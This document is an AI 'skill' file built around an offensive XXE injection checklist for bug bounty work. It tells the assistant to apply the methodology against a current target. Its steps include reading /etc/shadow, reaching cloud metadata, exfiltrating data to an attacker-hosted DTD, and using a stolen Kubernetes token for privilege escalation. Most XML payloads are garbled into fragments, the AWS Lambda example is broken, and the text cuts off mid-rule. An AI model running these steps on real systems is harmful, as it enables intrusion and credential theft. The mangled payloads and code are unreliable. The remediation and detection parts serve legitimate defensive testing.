# SKILL: XML External Entity (XXE) Injection

## Metadata

- **Skill Name**: xxe
- **Folder**: offensive-xxe
- **Source**: https://github.com/SnailSploit/offensive-checklist/blob/main/xxe.md

## Description

XML External Entity injection testing checklist: classic XXE, blind XXE (out-of-band), XXE via file upload (SVG/docx), XXE in SOAP/REST, error-based XXE, XInclude attacks, and XXE filter bypass. Use for web app XXE testing and bug bounty.

## Trigger Phrases

Use this skill when the conversation involves any of:
`XXE, XML external entity, blind XXE, out-of-band XXE, XXE file upload, SVG XXE, SOAP XXE, XInclude, entity bypass, XXE SSRF, XXE file read`

## Instructions for Claude

When this skill is active:

1. Load and apply the full methodology below as your operational checklist
2. Follow steps in order unless the user specifies otherwise
3. For each technique, consider applicability to the current target/context
4. Track which checklist items have been completed
5. Suggest next steps based on findings

---

## Full Methodology

# XML External Entity (XXE) Injection

## Shortcut

- Find data entry points that you can use to submit XML data.
- Determine whether the entry point is a candidate for a classic or blind XXE. The endpoint might be vulnerable to classic XXE if it returns the parsed XML data in the HTTP response. If the endpoint does not return results, it might still be vulnerable to blind XXE, and you should set up a callback listener for your tests.
- Try out a few test payloads to see if the parser is improperly configured. In the case of classic XXE, you can check whether the parser is processing external entities. In the case of blind XXE, you can make the server send requests to your callback listener to see if you can trigger outbound interaction.
- Try to exfiltrate a common system file, like /etc/hostname.
- You can also try to retrieve some more sensitive system files, like /etc/shadow or ~/.bash_history.
- If you cannot exfiltrate the entire file with a simple XXE payload, try to use an alternative data exfiltration method.
- See if you can launch an SSRF attack using the XXE.

## Mechanisms

XML External Entity (XXE) is a vulnerability that occurs when XML parsers process external entity references within XML documents. XXE attacks target applications that parse XML input and can lead to:

- Disclosure of confidential files and data
- Server-side request forgery (SSRF)
- Denial of service attacks
- Remote code execution in some cases

```mermaid
flowchart TD
    A[XXE Vulnerability] --> B[File Disclosure]
    A --> C[SSRF]
    A --> D[Denial of Service]
    A --> E[Remote Code Execution]
    B -->|"Access to"| B1[System Files]
    B -->|"Access to"| B2[Application Configs]
    B -->|"Access to"| B3[Database Credentials]
    C -->|"Access to"| C1[Internal Services]
    C -->|"Access to"| C2[Cloud Metadata]
    C -->|"Access to"| C3[External Resources]
    D -->|"Via"| D1[Billion Laughs]
    D -->|"Via"| D2[Quadratic Blowup]
    D -->|"Via"| D3[External Resource DoS]
    E -->|"Via"| E1[PHP Expect]
    E -->|"Via"| E2[Java Deserialization]
```

XXE vulnerabilities arise from XML's Document Type Definition (DTD) feature, which allows defining entities that can reference external resources. When a vulnerable XML parser processes these entities, it retrieves and includes the external resources, potentially exposing sensitive information.

In practice, full remote code execution rarely stems from XXE alone; it typically requires language-specific gadgets (such as PHP's `expect://` wrapper or Java deserialization sinks), which XXE merely helps reach.

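
To make the DTD mechanism described above concrete, here is a minimal Python sketch that lists which entities in a document are declared with an external identifier, without resolving any of them. It uses the standard library's `xml.parsers.expat`; the function name `list_external_entities` and the `SAMPLE` document are illustrative assumptions, not part of the original checklist.

```python
import xml.parsers.expat


def list_external_entities(xml_text: str) -> list[tuple[str, str]]:
    """Return (entity_name, system_id) pairs for externally declared entities.

    Nothing is fetched: no ExternalEntityRefHandler is installed, so the
    parser only reports the declarations it sees in the DTD.
    """
    found: list[tuple[str, str]] = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # Internal entities carry a literal `value`;
        # external entities carry a `system_id` (the URI to be resolved).
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


# Hypothetical sample document: one internal and one external entity.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY greeting "hello">
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<note>&greeting;</note>"""

if __name__ == "__main__":
    for name, target in list_external_entities(SAMPLE):
        print(f"external entity {name!r} -> {target}")
```

Only the entity declared with `SYSTEM` is reported; the internal `greeting` entity is ignored. A parser that goes one step further and dereferences the reported URI is what makes an endpoint exploitable.
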
```mermaid
sequenceDiagram
    actor A as Attacker
    participant C as Client
    participant S as Server
    participant X as XML Parser
    participant FS as File System
    A->>C: Craft malicious XML with XXE payload
    C->>S: Submit XML document
    S->>X: Pass XML for parsing
    X->>FS: Resolve external entity reference
    FS->>X: Return sensitive file content
    X->>S: Include file content in parsed result
    S->>C: Return response with sensitive data
    C->>A: Attacker views sensitive data
```

Types of XXE attacks include:

- **Classic XXE**: Direct extraction of data visible in responses
- **Blind XXE**: No direct output, but data can be exfiltrated through out-of-band techniques
- **Error-based XXE**: Leveraging error messages to extract data
- **XInclude-based XXE**: Using XInclude when direct DTD access is restricted

```mermaid
flowchart LR
    A[XXE Attack Types] --> B[Classic XXE]
    A --> C[Blind XXE]
    A --> D[Error-based XXE]
    A --> E[XInclude-based XXE]
    B -->|"Direct Output"| B1[Response contains file content]
    C -->|"Out-of-Band"| C1[Data exfiltration via callbacks]
    D -->|"Error Messages"| D1[Data in error output]
    E -->|"XInclude"| E1[Alternative to DTD]
```

## Hunt

### Finding XXE Vulnerabilities

#### Additional Discovery Methods

- Convert content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml"
- Check file uploads that allow docx/xlsx/pdf/zip: unzip the package and add XML code into the XML files
- Test SVG file uploads for XML injection
- Check RSS feeds functionality for XML injection
- Fuzz for /soap API endpoints
- Test SSO integration points for XML injection in SAML requests/responses

#### Identify XML Injection Points

```mermaid
flowchart TD
    A[XML Injection Points] --> B[API Endpoints]
    A --> C[File Uploads]
    A --> D[Format Conversion]
    A --> E[Legacy Interfaces]
    A --> F[Hidden XML Parsers]
    A --> G[Content-Type Conversion]
    B --> B1[REST APIs]
    B --> B2[GraphQL]
    C --> C1[XML Files]
    C --> C2[DOCX/XLSX]
    C --> C3[SVG Images]
    C --> C4[PDF Files]
    D --> D1[JSON to XML]
    D --> D2[CSV to XML]
    E --> E1[SOAP]
    E --> E2[XML-RPC]
    E --> E3[SAML]
    F --> F1[Hidden Parameters]
    F --> F2[Legacy Code]
    G --> G1[JSON endpoints accepting XML]
```

- **API Endpoints**: Look for endpoints accepting XML data
- **File Uploads**: Features accepting XML-based files (DOCX, SVG, XML, etc.)
- **Format Conversion**: Services converting to/from XML formats
- **Legacy Interfaces**: SOAP web services, XML-RPC
- **Hidden XML Parsers**: Look for parameters that might be processed as XML behind the scenes
- **Content Type Conversion**: Endpoints that accept JSON but may process XML with proper Content-Type

#### Test Basic XXE Patterns

For each potential injection point, test with simple payloads:

- **Classic XXE (file retrieval)**:

  ```xml
  ]> &xxe;
  ```

  or

  ```xml
  %test; ]> &test;
  ```

- **Blind XXE (out-of-band detection)**:

  ```xml
  %xxe; ]> test
  ```

- **XInclude attack** (when unable to define a DTD):

  ```xml
  ```

#### Billion Laughs Attack Steps

1. Capture the request in your proxy tool
2. Send it to repeater and convert body to XML format
3. Check the Accept header and modify to `application/xml` if needed
4. Convert JSON to XML if no direct XML input is possible
5. Insert the billion laughs payload between XML tags
6. Adjust entity references (lol1 to lol9) to control DoS intensity

#### Check Alternative XML Formats

- **SVG files**:

  ```xml
  ]> &xxe;
  ```

  or

  ```xml
  ]> &test;
  ```

- **DOCX/XLSX files**: Modify internal XML files (e.g., word/document.xml)
- **SOAP messages**: Test XXE in SOAP envelope

#### SAML 2.0 XXE Testing

SAML assertions are prime XXE targets. Test both requests and responses:

**AuthnRequest XXE:**

```xml
]> &xxe;
```

**Response Assertion XXE:**

```xml
]> &xxe;
```

**Encrypted Assertion XXE (Response Wrapping):**

```xml
%dtd;]> ...
```

#### E-book Format Exploitation (EPUB)

EPUB files are ZIP archives containing XML. Target library management systems and e-reader apps:

```xml
]> &xxe;
```

**Attack workflow:**

1. Create legitimate EPUB file
2. Extract contents (it's a ZIP)
3. Inject XXE into `META-INF/container.xml` or `content.opf`
4. Re-zip and upload to target (library systems, e-commerce platforms)

#### Apple Universal Links XXE

iOS deep linking configuration files:

```xml
]> &xxe;
```

### Advanced XXE Hunting

#### Parameter Entity Testing

```xml
"> %eval; %exfil; ]> test
```

#### Error-Based XXE

```xml
"> %eval; %error; ]> test
```

#### XXE via Content-Type Manipulation

Try changing Content-Type header from:

```
Content-Type: application/json
```

to:

```
Content-Type: application/xml
```

or:

```
Content-Type: text/xml
```

## Chaining and Escalation

### Cloud-Native & Kubernetes XXE

#### Kubernetes Admission Webhook XXE

Admission webhooks (registered via ValidatingWebhookConfiguration or MutatingWebhookConfiguration) receive JSON `AdmissionReview` requests, not XML. The risk arises when a webhook extracts XML embedded in an object field, such as an annotation, and parses it with a vulnerable parser:

```yaml
# Pod manifest targeting a vulnerable admission webhook
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  annotations:
    # Webhook receives and parses this XML
    config: |
      ]> &xxe;
```

**Exploitation flow:**

```bash
# 1. Create pod with XXE payload in annotation
kubectl apply -f evil-pod.yaml
# 2. Admission webhook extracts the XML and processes it with a vulnerable parser
# 3. Service account token exfiltrated
# 4. Use token for privilege escalation
curl -k https://kubernetes.default.svc/api/v1/namespaces/default/pods \
  -H "Authorization: Bearer $(cat token)"
```

**ConfigMap XXE:**

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: xxe-config
data:
  config.xml: |
    ]> &xxe;
```

#### CI/CD Pipeline XXE

**Jenkins XML Config Parsing:**

```xml
]> &xxe;
```

**GitLab CI Artifact Processing:**

```yaml
# .gitlab-ci.yml
test:
  script:
    - echo ']>&xxe;' > report.xml
  artifacts:
    reports:
      junit: report.xml  # Parsed by GitLab
```

**GitHub Actions Workflow:**

```yaml
# Vulnerable action that processes XML artifacts
- name: Parse XML Report
  uses: vulnerable/xml-parser@v1
  with:
    xml-file: |
      ]> &xxe;
```

**Maven/Gradle Dependency Confusion:**

```xml
]> 4.0.0 &xxe;
```

### Parser Misconfigurations

- **DTD Processing Enabled**: XML parsers with DTD processing enabled
- **External Entity Resolution**: Parsers allowing external entity references
- **XInclude Support**: Enabled processing of XInclude statements
- **Missing Entity Validation**: No validation of entity expansion

### File Disclosure via XXE

- **Local File Access**: Reading sensitive system files
  - `/etc/passwd` (Unix user information)
  - `/etc/shadow` (password hashes on Linux)
  - `C:\Windows\system32\drivers\etc\hosts` (Windows hosts file)
  - Application configuration files
  - Source code files
  - Database credentials

### SSRF via XXE

```mermaid
sequenceDiagram
    actor A as Attacker
    participant S as Vulnerable Server
    participant I as Internal Service
    participant C as Cloud Metadata
    A->>S: Submit XXE payload targeting internal service
    S->>I: Make request to internal service
    I->>S: Return internal service response
    S->>A: Return parsed result with internal data
    A->>S: Submit XXE payload targeting cloud metadata
    S->>C: Request cloud metadata (169.254.169.254)
    C->>S: Return sensitive cloud information
    S->>A: Return parsed result with cloud data
```

- **Internal Network Access**: Scanning internal systems
- **Cloud Metadata Access**: Accessing metadata services

**AWS IMDSv2** (Token-based, harder via XXE):

```xml
]>
```

**Azure Instance Metadata**:

```xml
]>
```

**GCP Metadata v2 (2024+)**:

```xml
]>
```

**Workarounds for header-protected metadata:**

```xml
]> ]>
```

### Denial of Service

- **Billion Laughs Attack**: Exponential entity expansion

  ```xml
  ]> &lol3;
  ```

- **Quadratic Blowup Attack**: Large string repeating

  ```xml
  ]> &a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;
  ```

- **External Resource DoS**: Loading large or never-ending external resources

## Bypass Techniques

### Filter Evasion Techniques

- **Case Variation**:

  ```xml
  ]>
  ```

- **Alternative Protocol Schemes**:

  ```
  file:///
  php://filter/convert.base64-encode/resource=
  gopher://
  jar://
  netdoc://
  ```

- **URL Encoding**:

  ```xml
  ]>
  ```

### XXE in CDATA Sections

```xml
"> %eval; %exfil; ]>]]>
```

### XXE via XML Namespace

```xml
```

### PHP Wrapper inside XXE

```xml
]> Jean &xxe; Dupont 00 11 22 33 44
42 rue du CTF
75000 Paris
```

```xml
]> &xxe;
```

## Methodologies

### Tools

#### XXE Detection and Exploitation Tools

- **OWASP ZAP**: XML External Entity scanner
- **Burp Suite Pro**: XXE scanner extension
- **XXEinjector**: Automated XXE testing tool
- **XXE-FTP**: Out-of-band XXE exploitation framework
- **dtd.gen**: DTD generator for XXE exfiltration
- **oxml_sec**: Tool for testing XXE in OOXML files (docx, xlsx, pptx)
- **Burp Suite Pro 2025.2+ (“Burp AI”)**: automatically chains scanner-found XXE with out-of-band callbacks for quicker triage.
- **Semgrep rules (java-xxe, python-xxe)**: static analysis that flags un-hardened XML parser usage.

#### Setup Tools for Out-of-Band Testing

- **Interactsh**: Interaction collection server
- **Burp Collaborator**: For out-of-band data detection
- **XSS Hunter**: Can be repurposed for XXE callbacks
- **SimpleHTTPServer**: Quick Python HTTP server setup (`python3 -m http.server` on Python 3)

### Testing Methodologies

```mermaid
flowchart TD
    A[XXE Testing Methodology] --> B[Identify XML Processing Points]
    B --> C[Setup Out-of-Band Detection]
    C --> D[Test Basic XXE Payloads]
    D --> E[Analyze Results]
    E --> F[Exploit Vulnerability]
    F --> G[Expand Attack]
    B --> B1[API Endpoints]
    B --> B2[File Uploads]
    B --> B3[SOAP/Legacy Interfaces]
    C --> C1[Burp Collaborator]
    C --> C2[Custom HTTP Server]
    C --> C3[Interactsh]
    D --> D1[Classic XXE]
    D --> D2[Blind XXE]
    D --> D3[Error-based XXE]
    D --> D4[XInclude Attack]
    E --> E1[Direct Data Exposure]
    E --> E2[HTTP Callbacks]
    E --> E3[Error Messages]
    F --> F1[Local File Reading]
    F --> F2[SSRF]
    F --> F3[Advanced Exfiltration]
    G --> G1[Sensitive Data]
    G --> G2[Internal Network]
    G --> G3[RCE Attempt]
```

#### Basic Testing Process

1. **Identify XML Processing**: Locate endpoints accepting XML input
2. **Setup Monitoring**: Prepare out-of-band detection for blind XXE
3. **Injection Testing**: Test with basic XXE payloads
4. **Result Analysis**: Check for direct data exposure or callbacks
5. **Vulnerability Confirmation**: Attempt to read a harmless file like `/etc/hostname`

#### Advanced Exploitation Techniques

##### Data Exfiltration (for Blind XXE)

```mermaid
sequenceDiagram
    actor A as Attacker
    participant AS as Attacker Server (DTD)
    participant VS as Vulnerable Server
    participant FS as File System
    A->>AS: Host malicious DTD file
    A->>VS: Submit XML with reference to external DTD
    VS->>AS: Request malicious DTD
    AS->>VS: Deliver DTD with file reading & exfiltration
    VS->>FS: Read sensitive file
    Note over VS: Process DTD instructions
    VS->>AS: Make callback with file content in URL
    AS->>A: Log request with exfiltrated data
```

1. Host a malicious DTD file on your server:

   ```xml
   "> %eval; %exfil;
   ```

2. Use an XXE payload that references your DTD:

   ```xml
   %dtd; ]> test
   ```

##### XXE OOB with DTD and PHP filter

Payload:

```xml
%sp; %param1; ]> &exfil;
```

External DTD (`http://your-attacker-server.com/dtd.xml`):

```dtd
">
```

##### Error-Based Exfiltration

1. Host a malicious DTD with error-based exfiltration:

   ```xml
   "> %eval; %error;
   ```

##### XXE for SSRF

Use XXE to trigger internal requests:

```xml
]>
```

##### XXE Inside SOAP

```xml
%dtd;]>]]>
```

##### XXE PoC Examples

```xml
]>&xxe_test;
```

```xml
]>&xxe_test;
```

```xml
]>&xxe_test;
```

##### XXE via File Upload (SVG Example)

Create an SVG file with the payload:

```xml
]> &xxe;
```

Upload it where SVG is allowed (e.g., profile picture, comment attachment).

#### Comprehensive XXE Testing Checklist

1. **Basic entity testing**:
   - Test file access via `file://` protocol
   - Test network access via `http://` protocol
2. **Content delivery**:
   - Direct XXE with immediate results
   - Out-of-band XXE with remote DTD
   - Error-based XXE for data extraction
3. **Protocol testing**:
   - Test various protocols (file, http, https, ftp, etc.)
   - Attempt restricted protocol access
4. **Format variations**:
   - Test XXE in SVG uploads
   - Test XXE in document formats (DOCX, XLSX, PDF)
   - Test SOAP/XML-RPC interfaces
5. **Bypasses**:
   - Try character encoding tricks
   - Use nested entities
   - Apply URL encoding
   - Test with namespace manipulations

## Remediation Recommendations

- Disable DTD processing completely if possible
- Disable external entity resolution
- Implement proper input validation
- Use safe XML parsers that disable XXE by default
- Apply patch management to XML parsers
- Use newer API formats like JSON where feasible
- **Network egress allow-list**: Restrict outbound traffic from XML-parsing hosts to block blind-XXE callbacks.
- **API Gateway XML Protection**: Implement XML threat protection at the gateway layer

### API Gateway XML Threat Protection

#### AWS API Gateway

```yaml
# API Gateway Request Validator
RequestValidator:
  Type: AWS::ApiGateway::RequestValidator
  Properties:
    ValidateRequestBody: true
    ValidateRequestParameters: true

# Lambda authorizer to inspect XML
def lambda_handler(event, context):
    body = event.get('body', '')
    # Block DTD declarations
    if ' 100000:  # 100KB
        return {
            'statusCode': 413,
            'body': 'Request too large'
        }
```

#### Kong Gateway

```yaml
plugins:
  - name: xml-threat-protection
    config:
      source_size_limit: 1000000   # 1MB max
      name_size_limit: 255         # Max element name length
      child_count_limit: 100       # Max child elements
      attribute_count_limit: 50    # Max attributes per element
      entity_expansion_limit: 0    # Disable entity expansion
      external_entity_limit: 0     # Disable external entities
      dtd_processing: false        # Disable DTD
```

#### Apigee Edge

```xml
request 10 5 3 10 1000 100 100 500 500
```

#### Nginx + ModSecurity

```nginx
# ModSecurity rules for XXE
SecRule REQUEST_BODY "@rx